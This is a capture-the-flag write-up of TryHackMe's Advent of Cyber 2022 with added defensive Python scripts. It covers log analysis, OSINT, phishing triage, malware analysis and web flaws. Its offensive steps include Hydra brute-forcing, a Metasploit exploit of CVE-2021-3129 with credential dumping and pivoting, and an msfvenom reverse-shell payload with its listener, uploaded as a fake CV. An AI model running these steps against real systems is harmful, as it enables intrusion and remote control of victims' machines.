
Tilak Khatri

Advent Cyber 2022 Writeup

Task 6 [Day 1] Frameworks | Someone’s coming to town!

NIST Cybersecurity Framework: The Cybersecurity Framework (CSF) was developed by the National Institute of Standards and Technology (NIST), and it provides detailed guidance for organizations to manage and reduce cybersecurity risk.

The framework focuses on five essential functions: Identify -> Protect -> Detect -> Respond -> Recover.

With these functions, the framework allows organizations to prioritize their cybersecurity investments and engage in continuous improvement towards a target cybersecurity profile.

Task 7 [Day 2] Log Analysis | Santa’s Naughty & Nice Log

1. Use the ls command to list the files present in the current directory. How many log files are present?

Ans: 2

2. Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?

Again use ls to see.

Ans: webserver.log

3. Begin investigating the log file from question #3 to answer the following questions.

4. On what day was Santa’s naughty and nice list stolen?

cat webserver.log | grep <check_each_day>

Ans: friday

5. What is the IP address of the attacker?

From the log file.

Ans: 10.10.249.191

6. What is the name of the important list that the attacker stole from Santa?

cat webserver.log | grep santa

Ans: santaslist.txt

7. Look through the log files for the flag. The format of the flag is: THM{}

grep -r "THM"
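
The grep commands above find the answers by eye. As an added example (not part of the original writeup or the TryHackMe room), the script below does the same log triage in Python: it parses Apache-style access log lines, reports who fetched a given file and on which weekday, and counts 4xx errors per client, which is how a scanning IP stands out. The log lines are constructed here to look like the room's webserver.log; they are not the real file.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample in Apache combined-log format. Shaped like the room's
# webserver.log (same attacker IP and stolen file name) but written for this example.
SAMPLE_LOG = """\
10.10.10.5 - - [17/Nov/2022:09:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.249.191 - - [18/Nov/2022:13:58:02 +0000] "GET /backup/ HTTP/1.1" 404 196 "-" "curl/7.68.0"
10.10.249.191 - - [18/Nov/2022:13:58:05 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "curl/7.68.0"
10.10.249.191 - - [18/Nov/2022:13:58:09 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "curl/7.68.0"
10.10.10.7 - - [18/Nov/2022:14:01:10 +0000] "GET /about.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.10.249.191 - - [18/Nov/2022:14:03:22 +0000] "GET /santaslist.txt HTTP/1.1" 200 8192 "-" "curl/7.68.0"
"""

# client ip, ident, user, [timestamp], "METHOD path protocol", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_log(text):
    """Turn raw log text into a list of dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entry["status"] = int(entry["status"])
        entries.append(entry)
    return entries


def requests_for(entries, path_fragment):
    """(weekday, client ip) for every request touching the given path: the day-of-theft question."""
    return [(e["ts"].strftime("%A"), e["ip"]) for e in entries if path_fragment in e["path"]]


def error_counts(entries):
    """4xx responses per client. A burst of 404s from one address is a classic enumeration signature."""
    return Counter(e["ip"] for e in entries if 400 <= e["status"] < 500)


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    print(requests_for(parsed, "santaslist.txt"))
    print(error_counts(parsed).most_common(3))
```

Running it on the real webserver.log only needs `parse_log(open("webserver.log").read())` in place of the sample, provided the server writes the combined log format.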

Task 8 [Day 3] OSINT | Nothing escapes detective McRed

1. What is the name of the Registrar for the domain santagift.shop?

whois santagift.shop

Ans: Namecheap Inc

2. Find the website’s source code (repository) on github.com and open the file containing sensitive credentials. Can you find the flag?

Go to github.com

search for santagift.shop

Ans: {THM_OSINT_WORKS}

3. What is the name of the file containing passwords?

Ans: config.php

4. What is the name of the QA server associated with the website?

Use Ctrl+F and search for “qa”; we will get:

Ans: qa.santagift.shop

5. What is the DB_PASSWORD that is being reused between the QA and PROD environments?

Same as above.

Ans: S@nta2022
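
The repository leaked two things at once: a credential committed in config.php and the same DB_PASSWORD reused between QA and PROD. As an added example (not from the writeup or the room), here is the kind of check a pre-commit hook or CI job can run over a repository to catch both before they are pushed. The file contents are constructed stand-ins with placeholder values; the regexes cover PHP define() calls and dotenv-style KEY=VALUE lines, which are assumptions about how such a project stores its settings.

```python
import re
from collections import defaultdict

# Constructed repository snapshot: path -> contents. Shaped like a PHP project with
# per-environment config files; none of these values come from the real repository.
REPO_FILES = {
    "config.php": (
        "<?php\n"
        "define('DB_HOST', 'qa-db.internal');\n"
        "define('DB_USER', 'app');\n"
        "define('DB_PASSWORD', 'PLACEHOLDER_Secret1');\n"
    ),
    "prod/config.php": (
        "<?php\n"
        "define('DB_HOST', 'prod-db.internal');\n"
        "define('DB_USER', 'app');\n"
        "define('DB_PASSWORD', 'PLACEHOLDER_Secret1');\n"
    ),
    ".env.example": "DB_PASSWORD=changeme\nAPI_KEY=\n",
    "README.md": "No secrets here.\n",
}

# Two common ways credentials land in source: PHP define() and dotenv KEY=VALUE.
SECRET_PATTERNS = [
    re.compile(
        r"define\(\s*'(?P<key>[A-Z_]*(?:PASSWORD|SECRET|KEY|TOKEN)[A-Z_]*)'\s*,\s*'(?P<value>[^']*)'"
    ),
    re.compile(
        r"^(?P<key>[A-Z_]*(?:PASSWORD|SECRET|KEY|TOKEN)[A-Z_]*)=(?P<value>\S+)$", re.M
    ),
]
# Values that are obviously not real credentials (example files, templates).
PLACEHOLDER_VALUES = {"", "changeme", "password", "xxx", "<redacted>"}


def find_secrets(files):
    """Return (path, key, value) for each credential-looking assignment with a non-placeholder value."""
    findings = []
    for path, content in files.items():
        for pattern in SECRET_PATTERNS:
            for m in pattern.finditer(content):
                if m.group("value").lower() not in PLACEHOLDER_VALUES:
                    findings.append((path, m.group("key"), m.group("value")))
    return findings


def reused_values(findings):
    """Secret values that appear in more than one file, mapped to the files sharing them.

    The same password in a QA and a PROD config is exactly the reuse the OSINT task found.
    """
    by_value = defaultdict(set)
    for path, _key, value in findings:
        by_value[value].add(path)
    return {value: sorted(paths) for value, paths in by_value.items() if len(paths) > 1}


if __name__ == "__main__":
    hits = find_secrets(REPO_FILES)
    for path, key, _value in hits:
        print(f"{path}: {key} is hard-coded")
    for value, paths in reused_values(hits).items():
        print(f"reused across {paths}")
```

Pointing it at a real checkout only means building the `files` dict from a directory walk; the scanner itself does not need to know anything about the project.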

Task 9 [Day 4] Scanning | Scanning through the snow

During the investigation of the downloaded GitHub repo (OSINT task), elf Recon McRed identified a URL qa.santagift.shop that is probably used by all the elves with admin privileges to add or delete gifts on the Santa website. The website has been pulled down for maintenance, and now Recon McRed is scanning the server to see how it's been compromised. Can you help McRed scan the network and find the reason for the website compromise?

For scanning I am using nmap; you could also go with nikto.

nmap -sC -sV -Pn <Machine_Ip>

What is the name of the HTTP server running on the remote host?

Apache

What is the name of the service running on port 22 on the QA server?

ssh

What flag can you find after successfully accessing the Samba service?

Task 10 [Day 5] Brute-Forcing | He knows when you're awake

Enumerate the Machine using nmap

The terminal window below shows that we have two listening services, SSH and VNC. Let’s see if we can discover the passwords used for these two services.

Let’s Exploit!!

Use Hydra to find the VNC password of the target with the IP address MACHINE_IP. What is the password?

Let’s use Hydra to crack the password!

Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services.

VNC servers do not require a username, so with Hydra we only supply the default password list rockyou.txt and the server address.

syntax:

hydra -l username -P wordlist.txt server service

Ans: 1q2w3e4r

Using a VNC client on the AttackBox, connect to the target of the IP address MACHINE_IP. What is the flag written on the target’s screen?

We found the password, so let’s try connecting to the machine with it.

Open Connections in Linux and type the IP of the machine.

Enter the IP address of the machine and the password, and we will get this:

Task 11 [Day 6] Email Analysis | It’s beginning to look a lot like phishing

What is the email address of the sender?

Ans: chief.elf@santaclaus.thm

What is the return address? Ans: murphy.evident@bandityeti.thm

On whose behalf was the email sent? Ans: Chief elf

What is the X-spam score? Ans: 3

What is hidden in the value of the Message-ID field?

Visit the email reputation check website provided in the task. What is the reputation result of the sender's email address?

Open the website emailrep.

Ans: Risky

Check the attachments. What is the filename of the attachment?

Ans: Division_of_labour-Load_share_plan.doc

What is the hash value of the attachment?

Use this analyser to analyse the .eml file: <https://eml-analyzer.herokuapp.com/>

Visit the Virus Total website and use the hash value to search. Navigate to the behavior section. What is the second tactic marked in the Mitre ATT&CK section?

Open VirusTotal and search for the hash:

https://www.virustotal.com/gui/file/0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467/behavior

Ans: defense evasion

Visit the InQuest website and use the hash value to search.

What is the subcategory of the file?

Open Inquest and Click Indicator Lookup and Search with the Hash

InQuest Labs: labs.inquest.net

Ans: macro_hunter
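
The online analyser answers these questions from the raw .eml, and the same fields are easy to pull out with Python's standard library. As an added example (not part of the original writeup or the room), the script below parses a constructed message with the same header names as the task: it compares the From domain with the Return-Path domain (the mismatch is the spoofing indicator), decodes the Message-ID local part from base64, reads the X-Spam-Score, and hashes every attachment. The message body, the attachment bytes and the hidden text are constructed for this example; only the header names and the attachment filename follow the room.

```python
import base64
import email
import hashlib
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: attachment bytes and the Message-ID content are made up here;
# they are NOT the real maldoc or the room's hidden value.
HIDDEN_TEXT = b"constructed hidden value"
HIDDEN_B64 = base64.b64encode(HIDDEN_TEXT).decode()
ATTACHMENT_BYTES = b"constructed attachment bytes, not the real document"
ATTACHMENT_SHA256 = hashlib.sha256(ATTACHMENT_BYTES).hexdigest()

SAMPLE_EML = f"""\
From: Chief Elf <chief.elf@santaclaus.thm>
Return-Path: <murphy.evident@bandityeti.thm>
To: elves@santaclaus.thm
Subject: Division of labour
X-Spam-Score: 3
Message-ID: <{HIDDEN_B64}@mail.bandityeti.thm>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="part1"

--part1
Content-Type: text/plain; charset="us-ascii"

Please review the attached plan.

--part1
Content-Type: application/msword; name="Division_of_labour-Load_share_plan.doc"
Content-Disposition: attachment; filename="Division_of_labour-Load_share_plan.doc"
Content-Transfer-Encoding: base64

{base64.b64encode(ATTACHMENT_BYTES).decode()}
--part1--
"""


def analyse_eml(raw):
    """Header triage for a phishing candidate; returns the fields the task asks about."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_addr = parseaddr(str(msg["From"]))[1]
    return_path = parseaddr(str(msg["Return-Path"] or ""))[1]
    # The displayed sender and the bounce address live in different domains:
    # the message claims to be from one party while replies and bounces go to another.
    sender_mismatch = from_addr.rsplit("@", 1)[-1] != return_path.rsplit("@", 1)[-1]

    # Message-ID local parts should be opaque. One that decodes to readable text is worth a note.
    hidden = None
    m = re.match(r"<([^@>]+)@", str(msg["Message-ID"] or ""))
    if m:
        try:
            hidden = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            hidden = None

    attachments = [
        (part.get_filename(), hashlib.sha256(part.get_payload(decode=True)).hexdigest())
        for part in msg.iter_attachments()
    ]
    return {
        "from": from_addr,
        "return_path": return_path,
        "sender_mismatch": sender_mismatch,
        "spam_score": int(str(msg["X-Spam-Score"]).strip()),
        "message_id_hidden": hidden,
        "attachments": attachments,
    }


if __name__ == "__main__":
    for key, value in analyse_eml(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

The attachment hash is what you would then paste into VirusTotal or InQuest, as the next questions do.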

Task 12 [Day 7] CyberChef | Maldocs roasting on an open fire

In this task we will learn about CyberChef. CyberChef is a web-based application used to slice, dice, encode, decode, parse and analyze data or files.

1. What is the version of CyberChef found in the attached VM?

2. How many recipes were used to extract URLs from the malicious doc?

The recipe operations are:

  • Strings('Single byte',256,'All printable chars (A)',false,false,false)
  • Find_/_Replace({'option':'Regex','string':'[\\[\\]\\n]'},'',true,false,true,false)
  • Drop_bytes(0,381,false)
  • From_Base64('A-Za-z0-9+/=',true,false)
  • Decode_text('UTF-16LE (1200)')
  • Find_/_Replace({'option':'Regex','string':'[\'()+\'"`]'},'',true,false,true,false)
  • Find_/_Replace({'option':'Simple string','string':']b2H'},'http',true,false,true,false)
  • Extract_URLs(true,false,false)
  • Split('@','\\n')
  • Defang_URL(true,true,true,'Valid domains and full URLs')

Total: 10
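
To show what each of the ten operations actually does to the data, here is the same recipe written out in Python as an added example (not from the writeup, the room, or CyberChef itself). The input is a constructed blob with the same shape the recipe expects: UTF-16LE text in which "http" was swapped for "]b2H", wrapped in quote and parenthesis noise, base64-encoded, split into bracketed chunks on separate lines, with some junk in front. The real document needed 381 bytes dropped; the constructed sample uses a 16-byte prefix, so that number is a parameter.

```python
import base64
import re

NOISE_LEN = 16  # junk bytes before the base64 body in the constructed sample (the real maldoc had 381)


def make_sample():
    """Constructed stand-in for the macro blob; NOT the room's document.

    Two URLs glued together with '@', 'http' replaced by ']b2H', wrapped in
    quotes and parentheses, encoded as UTF-16LE, then base64, then split into
    bracketed chunks the way a VBA string array would look.
    """
    text = "(']b2Hs://cdn.bandityeti.thm/files/mysterygift.exe'@']b2Hs://google.com/')"
    b64 = base64.b64encode(text.encode("utf-16-le")).decode("ascii")
    chunks = [b64[i:i + 20] for i in range(0, len(b64), 20)]
    lines = [b"A" * NOISE_LEN] + [f"[{c}]".encode("ascii") for c in chunks]
    return b"\n".join(lines)


def defang(url):
    """Step 10, Defang_URL: neutralise the URL so it cannot be clicked from a report."""
    return url.replace("http", "hxxp").replace("://", "[://]").replace(".", "[.]")


def cyberchef_pipeline(blob, drop_bytes):
    """The ten recipe steps, in order, applied to raw bytes."""
    # 1. Strings: runs of at least four printable single-byte characters, one per line
    text = "\n".join(s.decode("ascii") for s in re.findall(rb"[ -~]{4,}", blob))
    # 2. Find_/_Replace (regex): remove the array brackets and line breaks
    text = re.sub(r"[\[\]\n]", "", text)
    # 3. Drop_bytes: skip the leading noise that precedes the base64 body
    text = text[drop_bytes:]
    # 4. From_Base64
    raw = base64.b64decode(text)
    # 5. Decode_text: the payload was stored as UTF-16LE
    decoded = raw.decode("utf-16-le")
    # 6. Find_/_Replace (regex): strip quotes, parentheses, plus signs and backticks
    decoded = re.sub(r"['()+\"`]", "", decoded)
    # 7. Find_/_Replace (simple string): undo the ']b2H' substitution for 'http'
    decoded = decoded.replace("]b2H", "http")
    # 8. Extract_URLs
    urls = re.findall(r"https?://\S+", decoded)
    # 9. Split on '@': the macro joined its URLs with that separator, so one match holds several
    urls = [u for chunk in urls for u in chunk.split("@") if u]
    # 10. Defang_URL
    return [defang(u) for u in urls]


if __name__ == "__main__":
    for url in cyberchef_pipeline(make_sample(), NOISE_LEN):
        print(url)
```

Step 9 is the easy one to miss: Extract_URLs sees `...exe@https://google.com/` as a single URL because "@" is legal inside one, so the split is what separates the list.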

3. We found a URL that was downloading a suspicious file; what is the name of that malware?

<https://cdn.bandityeti.thm/files/mysterygift.exe>
Ans: mysterygift.exe

4. What is the last defanged URL of the bandityeti domain found in the last step?

Ans: hxxps[://]cdn[.]bandityeti[.]THM/files/index/

5. What is the ticket found in one of the domains? (Format: Domain/<GOLDEN_FLAG>)

Total found: 1

hxxps[://]cdn[.]bandityeti[.]thm/files/mysterygift[.]exe
hxxps[://]google[.]com/
hxxps[://]www[.]secretSanta[.]THM/Goldenticket/THM_MYSTERY_FLAG
hxxps[://]cdn[.]bandityeti[.]THM/files/index/

Ans: THM_MYSTERY_FLAG

Task 13 [Day 8] Smart Contracts | Last Christmas I gave you my ETH

Learning Objectives

  • Explain what smart contracts are, how they relate to the blockchain, and why they are important.
  • Understand how contracts are related, what they are built upon, and standard core functions.
  • Understand and exploit a common smart contract vulnerability.

Task 14 [Day 9] Pivoting | Dock the halls

1. Deploy the attached VM, and wait a few minutes. What ports are open?

Use nmap to see the open ports.

Ans: 80

2. What framework is the web application developed with?

Ans: laravel

3. What CVE is the application vulnerable to?

Search for known exploits for the framework version (Laravel v8.26.1, PHP v7.4.30) and you will find the CVE.

Ans: CVE-2021-3129

4. What command can be used to upgrade the last opened session to a Meterpreter session?

Ans: sessions -u -1

5. What file indicates a session has been opened within a Docker container?

A common way to tell if a compromised application is running in a Docker container is to verify the existence of a /.dockerenv file at the root directory of the filesystem.

Ans: /.dockerenv

6. What file often contains useful credentials for web applications?

Ans: .env

7. What database table contains useful credentials?

Ans: users

8. What is Santa’s password?

use auxiliary/admin/postgres/postgres_sql
run postgres://postgres:postgres@<MACHINE_IP>/postgres sql='select * from users'

In the previous step, we found Santa’s password.

Ans: p4$$w0rd

9. What ports are open on the host machine?

To further pivot through the private network, we can create a socks proxy within Metasploit:

use auxiliary/server/socks_proxy
run srvhost=127.0.0.1 srvport=9050 version=4a

This will expose a port on the attacker machine that you can run other network tools through, such as curl or proxychains.

10. What is the root flag?

With the host scanned, we can see that port 22 is open on the host machine. It is also possible that Santa has re-used his password, so we can SSH into the host machine from the Docker container to grab the flag:

use auxiliary/scanner/ssh/ssh_login
run ssh://santa:p4$$w0rd@{{ip}}

Search for the root.txt file in the root directory for the flag.

The following command can be used to upgrade the last opened session to a Meterpreter session (sessions -i -1 would only interact with it):

sessions -u -1

Task 15 [Day 10] Hack a game | You’re a mean one, Mr. Yeti

Learning Objectives

  • Learn how data is stored in memory in games or other applications.
  • Use simple tools to find and alter data in memory.
  • Explore the effects of changing data in memory on a running game.

Memory Program

Whenever we execute a program, the CPU processes its data through the computer’s RAM (Random Access Memory). If you think of a videogame, your HP, position, movement speed, and direction are all stored somewhere in memory and updated as needed as the game progresses.

We use Cetus, a simple browser plugin for Firefox and Chrome that lets you explore the memory space of WebAssembly games running in your browser.

What is the Guard’s flag?

When you follow all the steps in the instructions, you will save the memory address as a bookmark.

Note that Cetus uses hexadecimal notation to show you the numbers. If you need to convert the displayed digits to decimals,

Then, when the guard asks for the input, type it there and press Enter.

Voila!

Walk towards the guard and talk to him, and you will get the flag as shown below:

2. What is the Yeti’s flag?

To find the next flag, we have to cross the bridge. To accomplish this, we must find our HP value in the memory and alter it.

Start with a differential search, and don’t give any value as input.

You can run a second search using the LT operator without setting a value to search:

Try to get damaged by moving towards the snowballs.

You could do another search with the GT operator with no value again.

Finally, after following the instructions mentioned in the lab, I completed this task.

Task 16 [Day 11] Memory Forensics | Not all gifts are nice

What is memory Forensics?

  • Memory forensics is the analysis of the volatile memory that is in use when a computer is powered on.
  • Computers use dedicated storage devices called Random Access Memory (RAM) to remember what is being performed on the computer at the time. RAM is extremely quick and is the preferred method of storing and accessing data.
  • Volatility is a powerful tool used for analyzing memory dumps on Linux, Mac, and Windows systems.

1. What is the Windows version number that the memory image captured?

Scan the image for information gathering purposes using the command below:

python3 vol.py -f workstation.vmem windows.info

Ans: 10

2. What is the name of the binary/gift that secret Santa left?

Use the command below:

python3 vol.py -f workstation.vmem windows.pslist

windows.pslist: This plugin lists all of the processes that were running at the time of the capture.

Ans: mysterygift.exe

3. What is the Process ID (PID) of this binary?

Look at the screenshot above.

Ans: 2040

4. Dump the contents of this binary. How many files are dumped?

Now let’s dump the files associated with that PID using the command below:

python3 vol.py -f workstation.vmem windows.dumpfiles --pid 2040

Count the lines of output.

Ans: 16

Task 17 [Day 12] Malware Analysis | Forensic McBlue to the REVscue!

In this task we will learn about malware analysis.

Learning Objectives

  • Learn the fundamentals of analyzing malware samples without relying on automated sandbox scanners.
  • Learn and understand typical malware behavior and its importance in the incident investigation pipeline.

Two ways to analyse malware:

Static: without executing code.

Dynamic: by executing code in safe environment like sandbox.

1. What is the architecture of the malware sample? (32-bit/64-bit)

As you see in the picture below, the architecture of this malware is AMD64, which is 64-bit.

Ans: 64-bit

2. What is the packer used in the malware sample? (format: lowercase)

Analysing the image above, we find the packer.

Ans: upx

3. What is the compiler used to build the malware sample? (format: lowercase)

capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, or shellcode file and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

command: capa -vv mysterygift

4. How many MITRE ATT&CK techniques have been discovered attributed to the DISCOVERY tactic?

5. What is the registry key abused by the malware?

Here we open Process Monitor at the bottom of the screen.

Ans: HKCU\Software\Microsoft\Windows\CurrentVersion\Run

6. What is the value written on the registry key based on the previous question?

From above image, we can see RegSetValue which indicates what value malware has written after creation. After opening it we get our value.

Ans: c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat

7. What are the names of two files created by the malware under the C:\Users\Administrator\ directory? (format: file1,file2 in alphabetical order)

Again, search for the directory mentioned above in Process Monitor and you will get the file names.

Ans: test.jpg,wishes.bat

8. What are the two domains wherein malware has initiated a network connection? (format: domain1,domain2 in alphabetical order)

Unselect all filters and choose the third filter, Show Network Activity. Unlike the previous filters, the results are few and can be easily interpreted.

Ans: bestfestivalcompany.thm, virustotal.com

9. Going back to strings inside the malware sample, what is the complete URL used to download the file hosted in the first domain accessed by the malware?

Using the following command, we can extract the URLs in the malware:

strings mysterygift.exe | grep http://

Ans: http://bestfestivalcompany.thm/favicon.ico
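
The strings-and-grep step above is the manual version of static indicator extraction. As an added example (not from the writeup, the room, or any of the tools it uses), the script below does the same over raw bytes in Python: it pulls printable strings out of a binary and sorts them into URLs, Run-key registry paths and Windows file paths, which covers questions 5 to 9 of this task in one pass. The byte blob is constructed to contain strings of the kinds the writeup found; it is not the real mysterygift.exe.

```python
import re

# Constructed byte blob standing in for a binary. It carries a few printable strings of the
# kinds the writeup pulled from the sample (a URL, a Run key, a Startup-folder path); the
# surrounding bytes are arbitrary. Nothing here is the real mysterygift.exe.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 8
    + b"http://bestfestivalcompany.thm/favicon.ico\x00"
    + b"\x01\x02\x03"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    + b"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wishes.bat\x00"
    + b"\xff\xfe" + b"test.jpg\x00"
    + b"https://virustotal.com/\x00"
)

# Autostart keys with or without a hive prefix (HKCU\..., HKLM\..., or bare Software\...).
RUN_KEY_RE = re.compile(
    r"(?:HKCU|HKLM|HKEY_[A-Z_]+)?\\?Software\\Microsoft\\Windows\\CurrentVersion\\Run\w*", re.I
)
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")
# Drive letter, then backslash-separated segments without the characters Windows forbids.
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\(?:[^\\<>:"|?*]+\\)*[^\\<>:"|?*]+')


def strings(blob, min_len=4):
    """Equivalent of the strings(1) step: runs of printable ASCII at least min_len long."""
    return [s.decode("ascii") for s in re.findall(rb"[ -~]{%d,}" % min_len, blob)]


def extract_iocs(blob):
    """Bucket the extracted strings into the indicator types an analyst reports."""
    iocs = {"urls": set(), "registry_keys": set(), "file_paths": set()}
    for s in strings(blob):
        iocs["urls"].update(URL_RE.findall(s))
        iocs["registry_keys"].update(RUN_KEY_RE.findall(s))
        iocs["file_paths"].update(WIN_PATH_RE.findall(s))
    return {kind: sorted(values) for kind, values in iocs.items()}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_BINARY).items():
        print(kind)
        for v in values:
            print("  ", v)
```

Static strings only show what is visible in the unpacked image; the packer question earlier in the task is the reminder that a UPX-packed sample has to be unpacked first, or these patterns will find nothing.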

Task 18 [Day 13] Packet Analysis | Simply having a wonderful pcap time

Learning Objectives

  • Learn what traffic analysis is and why it still matters.
  • Learn the fundamentals of traffic analysis.
  • Learn the essential Wireshark features used in case investigation.
  • Learn how to assess the patterns and identify anomalies on the network.
  • Learn to use additional tools to identify malicious addresses and conduct further analysis.
  • Help the Elf team investigate suspicious traffic patterns.

Tools and websites used for this task:

  • Wireshark: packet capture and analysis
  • CyberChef (online version): defanging
  • VirusTotal: analysing the hash

1. What is the “Percent Packets” value of the “Hypertext Transfer Protocol”?

Ans: 0.3

2. Which port number has received more than 1000 packets?

Go to Statistics → Conversations → TCP.

Ans: 3389

3. What is the service name of the used protocol that received more than 1000 packets?

Remote Desktop Protocol (RDP) is a Microsoft proprietary protocol that enables remote connections to other computers, typically over TCP port 3389. It provides network access for a remote user over an encrypted channel.

4. What are the domain names? Enter the domains in alphabetical order and defanged format. (format: domain[.]zzz,domain[.]zzz)

Filter on dns, then right-click each DNS packet and choose Follow → UDP Stream.

Ans: bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm

6. Which IP address downloaded the executable file? Enter your answer in defanged format.

Ans: 10[.]10[.]29[.]186

7. Which domain address hosts the malicious file? Enter your answer in defanged format.

Right-click on the packet with the GET request for mysterygift.exe and choose Follow → HTTP Stream.

Ans: cdn[.]bandityeti[.]thm

8. What is the “user-agent” value used to download the non-executable file?

Right-click on the packet for the non-executable file and follow the HTTP stream.

Ans: Nim httpclient/1.6.8

9. What is the sha256 hash value of the executable file?

Export the HTTP object: click File → Export Objects → HTTP and save the file as it is.

Then run the following command:

sha256sum mysterygift.exe

Ans: 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f

10. What are the connected IP addresses? Enter the IP addresses defanged and in numerical order. (format: IPADDR,IPADDR)

Search the hash value of the executable file on VirusTotal. Navigate to the “Behaviour” section. There are multiple IP addresses associated with this file.

Click the Behaviour tab and Scroll below to Find IP

Ans: 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

Task 19 [Day 14] Web Applications | I’m dreaming of secure web apps

We will discuss one of the OWASP Top Ten vulnerabilities, Insecure Direct Object Reference (IDOR).

Learning Objectives

  • Web Applications
  • The Open Web Application Security Project (OWASP) Top 10
  • IDOR

Start the Firefox Browser and open the URL http://MACHINE_IP:8080. This link should show you a login page. McSkidy has provided us with the following credentials to test the web application:

  • Username: mcskidy
  • Password: devtest

1. What is the office number of Elf Pivot McRed?

After logging in successfully:

Change/Increment the ID in the URL to find the Elf Pivot McRed user account:

Keep incrementing the ID. When you reach 105, the Elf Pivot McRed user account will appear as shown below:

Ans: 134

2. Not only profile pages but also stored images are vulnerable. Start with a URL of a valid profile image; what is the hidden flag?

Right-click the image, choose Open Image in New Tab and change the id of the image; we get an image containing the flag, like the one below.

Ans: the{close_the_door}
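
Both questions exploit the same flaw: the server trusts the id in the URL and only checks that the record exists. As an added example (not from the writeup or the room's application), here is the vulnerable lookup beside two fixes in Python: an object-level authorisation check that ties the requested record to the logged-in session, and an indirect-reference scheme that hands the client a random token instead of a guessable numeric id. The user store is constructed for this example; the id 105 and office 134 mirror the writeup's answer but nothing here is the room's data.

```python
import secrets

# Constructed user store for the example. The id 105 and office 134 echo the
# writeup's answer, but this is not the room's real data.
USERS = {
    101: {"username": "mcskidy", "office": 112, "avatar": "img_101.jpg"},
    102: {"username": "elfmcblue", "office": 207, "avatar": "img_102.jpg"},
    105: {"username": "pivotmcred", "office": 134, "avatar": "img_105.jpg"},
}


class Forbidden(Exception):
    pass


def get_profile_vulnerable(session_user_id, requested_id):
    """IDOR: the id comes straight from the URL and the session is never consulted."""
    return USERS.get(requested_id)  # session_user_id is ignored; that is the bug


def get_profile_fixed(session_user_id, requested_id, is_admin=False):
    """Object-level authorisation: the record must belong to the caller unless they are an admin."""
    if requested_id != session_user_id and not is_admin:
        raise Forbidden(f"user {session_user_id} may not read profile {requested_id}")
    return USERS.get(requested_id)


def issue_reference(session_user_id, reference_map):
    """Indirect reference: give the client a random token in place of the database id."""
    token = secrets.token_urlsafe(16)
    reference_map[token] = session_user_id
    return token


def get_avatar_by_reference(reference_map, token):
    """Resolve the token server-side; incrementing or guessing tokens yields nothing."""
    user_id = reference_map.get(token)
    return USERS[user_id]["avatar"] if user_id in USERS else None


if __name__ == "__main__":
    print(get_profile_vulnerable(101, 105))      # another user's record, no questions asked
    try:
        get_profile_fixed(101, 105)
    except Forbidden as exc:
        print("fixed:", exc)
    refs = {}
    token = issue_reference(101, refs)
    print(get_avatar_by_reference(refs, token))  # own avatar
    print(get_avatar_by_reference(refs, "guess"))  # None
```

The second fix is what protects the image URLs in question 2: a file name like img_105.jpg is just another direct reference, so the same check (or the same token indirection) has to apply to static resources, not only to profile pages.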

Task 20 [Day 15] Secure Coding | Santa is looking for a Sidekick

In this task we talk about how to handle invalid input.

i.e Input Validation

Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems. Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation. This task will focus on how insufficient input validation can lead to an Unrestricted File Upload vulnerability.

Learning Objectives

  • Input validation of file upload functionality
  • Unrestricted file upload vulnerabilities
  • Phishing through file uploads
  • How to properly secure file upload functionality

Now let’s try uploading an executable file. Change the file type from .pdf to .exe and upload it to the website.

So it is possible to upload any type of file.

Let's use Metasploit to generate a malicious CV:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o cv-username.exe

You can then also use the following to create the associated listener in the msfconsole:

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.8.252.51; set LPORT 4444; exploit"

Once we have our CV, we can upload the file again. Once uploaded, give it a few minutes, and one of those elves should be reviewing our CV (It will take a while, and we have to wait):

Hurray! We got access to the server.

Search the directory mentioned in the task and you will get the flag.

flag: THM{Naughty.File.Uploads.Can.Get.You.RCE}

4. What defence technique can be implemented to ensure that specific file types can be uploaded?

To ensure that specific file types can be uploaded, we can verify the file extension. This will allow us to limit the type of files that can be uploaded.

Ans: file extension validation

